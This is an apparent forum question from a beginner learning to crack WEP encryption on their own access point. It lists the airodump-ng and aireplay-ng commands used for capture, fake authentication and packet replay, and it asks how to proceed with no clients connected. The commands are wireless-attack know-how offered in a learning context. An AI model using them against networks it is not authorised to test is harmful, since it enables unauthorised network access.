I'm pretty new to penetration testing and I'm trying to learn how to correctly use airodump-ng with aireplay-ng to break through wep encryption on my AP.

I have managed to get the password with clients attached to the AP by reinjecting ARP packets to collect IVs. I read an article on aircrack-ng.org about how to crack WEP with no wireless clients but it doesn't seem to work for me. I have tried to listen for any packets to reinject, but with no clients connected the AP seems to be silent. Is there any way to force the AP to send a packet without connecting a client to the network or is there any other way to break through the encryption?

I have also noted that some networks that are listed with airodump-ng is reported with signal strength -1. I assume this means that it is too far away. Am I correct in my assumption?

I am using the aircrack-ng suite on Arch Linux and the essid is broadcasted.

Commands I'm using:

airomon-ng start [wlan interface]

airodump-ng -w outputfile -c [channel] --bssid [mac_of_ap] [monitor interface]

Fake auth: aireplay-ng -1 0 -a [BSSID of AP] -h [Mac of wireless card]

or to continuously reassociate with AP:

aireplay-ng -1 6000 -o 1 -q 10 -e [Essid] -a [mac_of_ap] -h [Mac of wireless card] [monitor interface]

This command was supposed to take the first packet the AP sends and then reinject it: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID of AP] -h [Mac of WIC] mon0